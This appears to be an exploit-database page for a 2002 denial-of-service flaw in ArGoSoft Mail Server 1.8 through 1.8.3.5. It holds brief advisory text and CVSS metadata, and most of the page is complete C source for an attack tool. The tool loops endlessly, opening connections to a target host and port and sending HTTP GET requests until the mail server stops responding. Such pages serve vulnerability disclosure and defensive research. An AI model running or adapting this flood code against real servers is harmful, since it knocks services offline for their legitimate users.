Denial of Service Attack against ArGoSoft Mail Server Version 1.8 (1.8.3.5)

vendor:

Mail Server

by:

posidron

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Mail Server

Affected Version From: 1.8

Affected Version To: 1.8.3.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2002

Denial of Service Attack against ArGoSoft Mail Server Version 1.8 (1.8.3.5)

An attacker may exploit this condition to effectively deny service to legitimate ArGoSoft Mail server users until the service is restarted.

Mitigation:

Restart the service to restore the service.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/7873/info

ArGoSoft Mail Server has been reported prone to a denial of service condition when handling multiple GET requests, in rapid succession.

An attacker may exploit this condition to effectively deny service to legitimate ArGoSoft Mail server users until the service is restarted.

/**********************************************************************************
*
*     Denial of Service Attack against ArGoSoft Mail Server Version 1.8
(1.8.3.5)
*
*    Tripbit Security Development
*    ---------------------------------
*
*    Author: posidron
*
*    Contact
*    [-] Mail: posidron@tripbit.org
*    [-] Web: http://www.tripbit.org
*    [-] Forum: http://www.tripbit.org/wbboard
*    [-] IRC: irc.euirc.net 6667 #tripbit
*
*    Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe, PeaceTreaty
*
**********************************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
    int port, sockfd;
    struct sockaddr_in server;
    struct hostent *host;
    char sendstring[1024];

    strcpy(sendstring, "GET  /index.html HTTP/1.0\n\n");

    if(argc < 3)
    {
        printf("Usage: %s [target] <port>\n", argv[0]);
        exit(0);
    }

    port = atoi(argv[2]);

    host = gethostbyname(argv[1]);
    if(host == NULL)
    {
        printf("Connection failed!...\n");
        exit(0);
    }

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr((char*)argv[1]);

    printf("Dos against ArGoSoft Mail Server Version 1.8 (1.8.3.5)\n");

    for(;;)
    {
        if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
        {
            printf("socket() failed!\n");
            exit(0);
        }

        if(connect(sockfd, (struct sockaddr*)&server, sizeof(server)) < 0)
        {
            printf("connect() failed!\n");
            close(sockfd);
        }

        if (write(sockfd, sendstring, strlen(sendstring)) < 0)
        {
            break;
        }

        close(sockfd);
    }

    printf("Attack done!...\n");
}